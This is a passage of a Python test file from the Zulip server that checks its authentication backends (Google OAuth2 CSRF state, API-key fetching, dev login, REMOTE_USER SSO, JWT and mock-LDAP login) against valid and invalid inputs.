def test_google_oauth2_missing_csrf(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
'Missing Google oauth2 CSRF state')
def test_google_oauth2_csrf_malformed(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/?state=badstate")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
'Missing Google oauth2 CSRF state')
def test_google_oauth2_csrf_badstate(self):
# type: () -> None
with mock.patch("logging.warning") as m:
result = self.client_get("/accounts/login/google/done/?state=badstate:otherbadstate:more::")
self.assertEqual(result.status_code, 400)
self.assertEqual(m.call_args_list[0][0][0],
'Google oauth2 CSRF error')
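
# Tests for /api/v1/fetch_api_key, which exchanges a username/password (or a
# Google OAuth2 token) for the user's API key.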
class FetchAPIKeyTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.user_profile = self.example_user('hamlet')
self.email = self.user_profile.email
def test_success(self):
# type: () -> None
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_success(result)
def test_invalid_email(self):
# type: () -> None
result = self.client_post("/api/v1/fetch_api_key",
dict(username='hamlet',
password=initial_password(self.email)))
self.assert_json_error(result, "Enter a valid email address.", 400)
def test_wrong_password(self):
# type: () -> None
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password="wrong"))
self.assert_json_error(result, "Your username or password is incorrect.", 403)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',),
SEND_LOGIN_EMAILS=True)
def test_google_oauth2_token_success(self):
# type: () -> None
self.assertEqual(len(mail.outbox), 0)
with mock.patch(
'apiclient.sample_tools.client.verify_id_token',
return_value={
"email_verified": True,
"email": self.example_email("hamlet"),
}):
result = self.client_post("/api/v1/fetch_api_key",
dict(username="google-oauth2-token",
password="token"))
self.assert_json_success(result)
self.assertEqual(len(mail.outbox), 1)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_google_oauth2_token_failure(self):
# type: () -> None
payload = dict(email_verified=False)
with mock.patch('apiclient.sample_tools.client.verify_id_token', return_value=payload):
result = self.client_post("/api/v1/fetch_api_key",
dict(username="google-oauth2-token",
password="token"))
self.assert_json_error(result, "Your username or password is incorrect.", 403)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_google_oauth2_token_unregistered(self):
# type: () -> None
with mock.patch(
'apiclient.sample_tools.client.verify_id_token',
return_value={
"email_verified": True,
"email": "[email protected]",
}):
result = self.client_post("/api/v1/fetch_api_key",
dict(username="google-oauth2-token",
password="token"))
self.assert_json_error(
result,
"This user is not registered; do so from a browser.",
403)
def test_password_auth_disabled(self):
# type: () -> None
with mock.patch('zproject.backends.password_auth_enabled', return_value=False):
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_error_contains(result, "Password auth is disabled", 403)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_auth_email_auth_disabled_success(self):
# type: () -> None
ldap_patcher = mock.patch('django_auth_ldap.config.ldap.initialize')
self.mock_initialize = ldap_patcher.start()
self.mock_ldap = MockLDAP()
self.mock_initialize.return_value = self.mock_ldap
self.backend = ZulipLDAPAuthBackend()
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password="testing"))
self.assert_json_success(result)
self.mock_ldap.reset()
self.mock_initialize.stop()
def test_inactive_user(self):
# type: () -> None
do_deactivate_user(self.user_profile)
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_error_contains(result, "Your account has been disabled", 403)
def test_deactivated_realm(self):
# type: () -> None
do_deactivate_realm(self.user_profile.realm)
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_error_contains(result, "Your realm has been deactivated", 403)
class DevFetchAPIKeyTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.user_profile = self.example_user('hamlet')
self.email = self.user_profile.email
def test_success(self):
# type: () -> None
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_success(result)
data = result.json()
self.assertEqual(data["email"], self.email)
self.assertEqual(data['api_key'], self.user_profile.api_key)
def test_invalid_email(self):
# type: () -> None
email = 'hamlet'
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=email))
self.assert_json_error_contains(result, "Enter a valid email address.", 400)
def test_unregistered_user(self):
# type: () -> None
email = '[email protected]'
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=email))
self.assert_json_error_contains(result, "This user is not registered.", 403)
def test_inactive_user(self):
# type: () -> None
do_deactivate_user(self.user_profile)
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_error_contains(result, "Your account has been disabled", 403)
def test_deactivated_realm(self):
# type: () -> None
do_deactivate_realm(self.user_profile.realm)
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_error_contains(result, "Your realm has been deactivated", 403)
def test_dev_auth_disabled(self):
# type: () -> None
with mock.patch('zerver.views.auth.dev_auth_enabled', return_value=False):
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_error_contains(result, "Dev environment not enabled.", 400)
class DevGetEmailsTest(ZulipTestCase):
def test_success(self):
# type: () -> None
result = self.client_get("/api/v1/dev_get_emails")
self.assert_json_success(result)
self.assert_in_response("direct_admins", result)
self.assert_in_response("direct_users", result)
def test_dev_auth_disabled(self):
# type: () -> None
with mock.patch('zerver.views.auth.dev_auth_enabled', return_value=False):
result = self.client_get("/api/v1/dev_get_emails")
self.assert_json_error_contains(result, "Dev environment not enabled.", 400)
class FetchAuthBackends(ZulipTestCase):
def assert_on_error(self, error):
# type: (Optional[str]) -> None
if error:
raise AssertionError(error)
def test_get_server_settings(self):
# type: () -> None
result = self.client_get("/api/v1/server_settings",
subdomain="")
self.assert_json_success(result)
data = result.json()
schema_checker = check_dict_only([
('authentication_methods', check_dict_only([
('google', check_bool),
('github', check_bool),
('email', check_bool),
('ldap', check_bool),
('dev', check_bool),
('password', check_bool),
])),
('email_auth_enabled', check_bool),
('require_email_format_usernames', check_bool),
('realm_uri', check_string),
('zulip_version', check_string),
('msg', check_string),
('result', check_string),
])
self.assert_on_error(schema_checker("data", data))
with self.settings(ROOT_DOMAIN_LANDING_PAGE=False):
result = self.client_get("/api/v1/server_settings",
subdomain="")
self.assert_json_success(result)
data = result.json()
schema_checker = check_dict_only([
('authentication_methods', check_dict_only([
('google', check_bool),
('github', check_bool),
('dev', check_bool),
('email', check_bool),
('ldap', check_bool),
('password', check_bool),
])),
('email_auth_enabled', check_bool),
('require_email_format_usernames', check_bool),
('realm_uri', check_string),
('zulip_version', check_string),
('msg', check_string),
('result', check_string),
])
self.assert_on_error(schema_checker("data", data))
with self.settings(ROOT_DOMAIN_LANDING_PAGE=False):
result = self.client_get("/api/v1/server_settings",
subdomain="zulip")
self.assert_json_success(result)
data = result.json()
with_realm_schema_checker = check_dict_only([
('zulip_version', check_string),
('realm_uri', check_string),
('realm_name', check_string),
('realm_description', check_string),
('realm_icon', check_string),
('email_auth_enabled', check_bool),
('require_email_format_usernames', check_bool),
('authentication_methods', check_dict_only([
('google', check_bool),
('github', check_bool),
('dev', check_bool),
('email', check_bool),
('ldap', check_bool),
('password', check_bool),
])),
('msg', check_string),
('result', check_string),
])
self.assert_on_error(with_realm_schema_checker("data", data))
def test_fetch_auth_backend_format(self):
# type: () -> None
result = self.client_get("/api/v1/get_auth_backends")
self.assert_json_success(result)
data = result.json()
self.assertEqual(set(data.keys()),
{'msg', 'password', 'github', 'google', 'email', 'ldap',
'dev', 'result', 'zulip_version'})
for backend in set(data.keys()) - {'msg', 'result', 'zulip_version'}:
self.assertTrue(isinstance(data[backend], bool))
def test_fetch_auth_backend(self):
# type: () -> None
backends = [GoogleMobileOauth2Backend(), DevAuthBackend()]
with mock.patch('django.contrib.auth.get_backends', return_value=backends):
result = self.client_get("/api/v1/get_auth_backends")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': True,
'dev': True,
'email': False,
'ldap': False,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
# Test subdomains cases
with self.settings(ROOT_DOMAIN_LANDING_PAGE=False):
result = self.client_get("/api/v1/get_auth_backends")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': True,
'email': False,
'ldap': False,
'dev': True,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
# Verify invalid subdomain
result = self.client_get("/api/v1/get_auth_backends",
subdomain="invalid")
self.assert_json_error_contains(result, "Invalid subdomain", 400)
# Verify correct behavior with a valid subdomain with
# some backends disabled for the realm
realm = get_realm("zulip")
do_set_realm_authentication_methods(realm, dict(Google=False, Email=False, Dev=True))
result = self.client_get("/api/v1/get_auth_backends",
subdomain="zulip")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': False,
'email': False,
'ldap': False,
'dev': True,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
# With ROOT_DOMAIN_LANDING_PAGE, homepage fails
result = self.client_get("/api/v1/get_auth_backends",
subdomain="")
self.assert_json_error_contains(result, "Subdomain required", 400)
# With ROOT_DOMAIN_LANDING_PAGE, subdomain pages succeed
result = self.client_get("/api/v1/get_auth_backends",
subdomain="zulip")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': False,
'email': False,
'ldap': False,
'dev': True,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
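
# The development-environment auth backend allows logging in as any listed
# user; these tests cover direct_email login and the /devlogin/ realm chooser.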
class TestDevAuthBackend(ZulipTestCase):
def test_login_success(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
data = {'direct_email': email}
result = self.client_post('/accounts/login/local/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_with_subdomain(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
data = {'direct_email': email}
result = self.client_post('/accounts/login/local/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_choose_realm(self):
# type: () -> None
result = self.client_post('/devlogin/', subdomain="zulip")
self.assert_in_success_response(["Click on a user to log in to Zulip Dev!"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
result = self.client_post('/devlogin/', subdomain="")
self.assert_in_success_response(["Click on a user to log in!"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
data = {'new_realm': 'zephyr'}
result = self.client_post('/devlogin/', data, subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zephyr.testserver")
result = self.client_get('/devlogin/', subdomain="zephyr")
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["Click on a user to log in to MIT!"], result)
self.assert_not_in_success_response(["[email protected]", "[email protected]"], result)
def test_choose_realm_with_subdomains_enabled(self):
# type: () -> None
with mock.patch('zerver.views.auth.is_subdomain_root_or_alias', return_value=False):
with mock.patch('zerver.views.auth.get_realm_from_request', return_value=get_realm('zulip')):
result = self.client_get("http://zulip.testserver/devlogin/")
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_not_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["Click on a user to log in to Zulip Dev!"], result)
with mock.patch('zerver.views.auth.get_realm_from_request', return_value=get_realm('zephyr')):
result = self.client_post("http://zulip.testserver/devlogin/", {'new_realm': 'zephyr'})
self.assertEqual(result["Location"], "http://zephyr.testserver")
result = self.client_get("http://zephyr.testserver/devlogin/")
self.assert_not_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["Click on a user to log in to MIT!"], result)
def test_login_failure(self):
# type: () -> None
email = self.example_email("hamlet")
data = {'direct_email': email}
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',)):
with self.assertRaisesRegex(Exception, 'Direct login not supported.'):
with mock.patch('django.core.handlers.exception.logger'):
self.client_post('/accounts/login/local/', data)
def test_login_failure_due_to_nonexistent_user(self):
# type: () -> None
email = '[email protected]'
data = {'direct_email': email}
with self.assertRaisesRegex(Exception, 'User cannot login'):
with mock.patch('django.core.handlers.exception.logger'):
self.client_post('/accounts/login/local/', data)
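
# REMOTE_USER SSO: an external web server (or other frontend) authenticates
# the user and passes the identity in REMOTE_USER to /accounts/login/sso/.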
class TestZulipRemoteUserBackend(ZulipTestCase):
def test_login_success(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_authenticate_with_missing_user(self):
# type: () -> None
backend = ZulipRemoteUserBackend()
self.assertIs(backend.authenticate(None), None)
def test_login_success_with_sso_append_domain(self):
# type: () -> None
username = 'hamlet'
user_profile = self.example_user('hamlet')
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',),
SSO_APPEND_DOMAIN='zulip.com'):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=username)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_failure(self):
# type: () -> None
email = self.example_email("hamlet")
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
        self.assertEqual(result.status_code, 200)  # This should ideally not be 200.
self.assertIs(get_session_dict_user(self.client.session), None)
def test_login_failure_due_to_nonexisting_user(self):
# type: () -> None
email = '[email protected]'
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assertEqual(result.status_code, 200)
self.assertIs(get_session_dict_user(self.client.session), None)
self.assert_in_response("No account found for", result)
def test_login_failure_due_to_invalid_email(self):
# type: () -> None
email = 'hamlet'
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assert_json_error_contains(result, "Enter a valid email address.", 400)
def test_login_failure_due_to_missing_field(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/')
self.assert_json_error_contains(result, "No REMOTE_USER set.", 400)
def test_login_failure_due_to_wrong_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
with mock.patch('zerver.views.auth.get_subdomain', return_value='acme'):
result = self.client_post('http://testserver:9080/accounts/login/sso/',
REMOTE_USER=email)
self.assertEqual(result.status_code, 200)
self.assertIs(get_session_dict_user(self.client.session), None)
self.assert_in_response("No account found for", result)
def test_login_failure_due_to_empty_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
with mock.patch('zerver.views.auth.get_subdomain', return_value=''):
result = self.client_post('http://testserver:9080/accounts/login/sso/',
REMOTE_USER=email)
self.assertEqual(result.status_code, 200)
self.assertIs(get_session_dict_user(self.client.session), None)
self.assert_in_response("No account found for", result)
def test_login_success_under_subdomains(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
with mock.patch('zerver.views.auth.get_subdomain', return_value='zulip'):
with self.settings(
AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assertEqual(result.status_code, 302)
self.assertIs(get_session_dict_user(self.client.session), user_profile.id)
class TestJWTLogin(ZulipTestCase):
"""
JWT uses ZulipDummyBackend.
"""
def test_login_success(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
email = self.example_email("hamlet")
realm = get_realm('zulip')
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
user_profile = get_user(email, realm)
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_failure_when_user_is_missing(self):
# type: () -> None
payload = {'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "No user specified in JSON web token claims", 400)
def test_login_failure_when_realm_is_missing(self):
# type: () -> None
payload = {'user': 'hamlet'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "No realm specified in JSON web token claims", 400)
def test_login_failure_when_key_does_not_exist(self):
# type: () -> None
data = {'json_web_token': 'not relevant'}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Auth key for this subdomain not found.", 400)
def test_login_failure_when_key_is_missing(self):
# type: () -> None
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
result = self.client_post('/accounts/login/jwt/')
self.assert_json_error_contains(result, "No JSON web token passed in request", 400)
def test_login_failure_when_bad_token_is_passed(self):
# type: () -> None
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
result = self.client_post('/accounts/login/jwt/')
self.assert_json_error_contains(result, "No JSON web token passed in request", 400)
data = {'json_web_token': 'bad token'}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Bad JSON web token", 400)
def test_login_failure_when_user_does_not_exist(self):
# type: () -> None
payload = {'user': 'nonexisting', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
            self.assertEqual(result.status_code, 200)  # This should ideally not be 200.
self.assertIs(get_session_dict_user(self.client.session), None)
# The /accounts/login/jwt/ endpoint should also handle the case
# where the authentication attempt throws UserProfile.DoesNotExist.
with mock.patch(
'zerver.views.auth.authenticate',
side_effect=UserProfile.DoesNotExist("Do not exist")):
result = self.client_post('/accounts/login/jwt/', data)
                self.assertEqual(result.status_code, 200)  # This should ideally not be 200.
self.assertIs(get_session_dict_user(self.client.session), None)
def test_login_failure_due_to_wrong_subdomain(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'acme': 'key'}):
with mock.patch('zerver.views.auth.get_subdomain', return_value='acme'), \
mock.patch('logging.warning'):
auth_key = settings.JWT_AUTH_KEYS['acme']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Wrong subdomain", 400)
self.assertEqual(get_session_dict_user(self.client.session), None)
def test_login_failure_due_to_empty_subdomain(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'': 'key'}):
with mock.patch('zerver.views.auth.get_subdomain', return_value=''), \
mock.patch('logging.warning'):
auth_key = settings.JWT_AUTH_KEYS['']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Wrong subdomain", 400)
self.assertEqual(get_session_dict_user(self.client.session), None)
def test_login_success_under_subdomains(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
with mock.patch('zerver.views.auth.get_subdomain', return_value='zulip'):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assertEqual(result.status_code, 302)
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
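
# The LDAP tests run against an in-memory MockLDAP directory rather than a
# real server; each entry maps a DN to its attributes (e.g. userPassword).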
class TestLDAP(ZulipTestCase):
def setUp(self):
# type: () -> None
user_profile = self.example_user('hamlet')
self.setup_subdomain(user_profile)
ldap_patcher = mock.patch('django_auth_ldap.config.ldap.initialize')
self.mock_initialize = ldap_patcher.start()
self.mock_ldap = MockLDAP()
self.mock_initialize.return_value = self.mock_ldap
self.backend = ZulipLDAPAuthBackend()
# Internally `_realm` attribute is automatically set by the
# `authenticate()` method. But for testing the `get_or_create_user()`
# method separately, we need to set it manually.
self.backend._realm = get_realm('zulip')
def tearDown(self):
# type: () -> None
self.mock_ldap.reset()
self.mock_initialize.stop()
def setup_subdomain(self, user_profile):
# type: (UserProfile) -> None
realm = user_profile.realm
realm.string_id = 'zulip'
realm.save()
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing')
assert(user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_with_email_attr(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=letham,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
                'email': ['hamlet@zulip.com'],
}
}
with self.settings(LDAP_EMAIL_ATTR='email',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate("letham", 'testing')
assert (user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_wrong_password(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user = self.backend.authenticate(self.example_email("hamlet"), 'wrong')
self.assertIs(user, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_nonexistent_user(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user = self.backend.authenticate('[email protected]', 'testing')
self.assertIs(user, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_permissions(self):
# type: () -> None
backend = self.backend
self.assertFalse(backend.has_perm(None, None))
self.assertFalse(backend.has_module_perms(None, None))
        self.assertEqual(backend.get_all_permissions(None, None), set())
        self.assertEqual(backend.get_group_permissions(None, None), set())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_django_to_ldap_username(self):
# type: () -> None
backend = self.backend
with self.settings(LDAP_APPEND_DOMAIN='zulip.com'):
username = backend.django_to_ldap_username('"hamlet@test"@zulip.com')
self.assertEqual(username, '"hamlet@test"')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_to_django_username(self):
# type: () -> None
backend = self.backend
with self.settings(LDAP_APPEND_DOMAIN='zulip.com'):
username = backend.ldap_to_django_username('"hamlet@test"')
self.assertEqual(username, '"hamlet@test"@zulip.com')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_user_exists(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
backend = self.backend
email = self.example_email("hamlet")
user_profile, created = backend.get_or_create_user(str(email), _LDAPUser())
self.assertFalse(created)
self.assertEqual(user_profile.email, email)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_user_does_not_exist(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
user_profile, created = backend.get_or_create_user(email, _LDAPUser())
self.assertTrue(created)
self.assertEqual(user_profile.email, email)
self.assertEqual(user_profile.full_name, 'Full Name')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_user_has_invalid_name(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['<invalid name>'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
with self.assertRaisesRegex(Exception, "Invalid characters in name!"):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_realm_is_deactivated(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
do_deactivate_realm(backend._realm)
with self.assertRaisesRegex(Exception, 'Realm has been deactivated'):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_realm_is_none(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
backend._realm = None
with self.assertRaisesRegex(Exception, 'Realm is None'):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_ldap_has_no_email_attr(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
nonexisting_attr = 'email'
with self.settings(LDAP_EMAIL_ATTR=nonexisting_attr):
backend = self.backend
email = '[email protected]'
with self.assertRaisesRegex(Exception, 'LDAP user doesn\'t have the needed email attribute'):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_django_to_ldap_username_when_domain_does_not_match(self):
# type: () -> None
backend = self.backend
email = self.example_email("hamlet")
with self.assertRaisesRegex(Exception, 'Username does not match LDAP domain.'):
with self.settings(LDAP_APPEND_DOMAIN='acme.com'):
backend.django_to_ldap_username(email)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_when_domain_does_not_match(self):
# type: () -> None
with self.settings(LDAP_APPEND_DOMAIN='acme.com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'pass')
self.assertIs(user_profile, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_wrong_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
